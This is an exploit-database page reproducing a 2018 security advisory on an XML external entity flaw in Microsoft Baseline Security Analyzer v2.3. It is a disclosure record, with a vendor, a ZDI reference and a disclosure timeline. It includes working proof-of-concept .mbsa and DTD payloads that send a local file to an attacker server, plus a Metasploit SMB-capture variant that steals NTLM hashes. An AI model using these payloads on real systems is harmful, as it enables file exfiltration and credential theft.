Advertisement






Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection

CVE Category Price Severity
CVE-XXXX-XXXX CWE-611 $5000 Critical
Author Risk Exploitation Type Date
Anonymous High Remote 2018-09-08
CPE
cpe:cpe:/a:microsoft:baseline_security_analyzer:2.3
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018090077

Below is a copy:

Microsoft Baseline Security Analyzer v2.3 / XML External Entity Injection
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/MICROSOFT-BASELINE-ANALYZER-v2.3-XML-INJECTION.txt
[+] ISR: Apparition Security          
[+] Zero Day Initiative Program


[Vendor]
www.microsoft.com


[Product]
Microsoft Baseline Security Analyzer v2.3

Microsoft Baseline Security Analyzer (MBSA) is a software tool released by Microsoft to determine security state by assessing missing security updates and less-secure
security settings within Microsoft Windows, Windows components such as Internet Explorer, IIS web server, and products Microsoft SQL Server, and Microsoft Office macro settings.


[Vulnerability Type]
XML External Entity Injection


[ZDI Reference]
ZDI-CAN-6307


[Security Issue]
Microsoft Baseline Security Analyzer allows local files to be exfiltrated to a remote attacker controlled server if a user opens a specially crafted ".mbsa" file.



[Exploit/POC]

Install MBSA

https://www.microsoft.com/en-us/download/details.aspx?id=7558

1) "evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [ 
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://127.0.0.1:8000/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>

2) "payload.dtd"

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://127.0.0.1:8000?%file;'>">
%all;

When victim attempts open file they get prompted "Do you want to let this app make changes to your device?"
However, it also indicates it is a "verified publisher" namely Microsoft. After opening the local users files can be exfiltrated to a remote server.
Moreover, we can use this to steal NTLM hashes.

Using Forced Authentication to steal NTLM hashes

2) msf > use auxiliary/server/capture/smb
msf auxiliary(smb) > exploit -j

"evil.mbsa"

<?xml version="1.0"?>
<!DOCTYPE fileppe_fingerz [ 
<!ENTITY % dtd SYSTEM "\\192.168.114.153\unknwonfilez">
%dtd;]>

Result: credentials captured by remote sever



[Network Access]
Remote



[Severity]
High



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
Vendor reply: Program deprecated
September 8, 2018 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum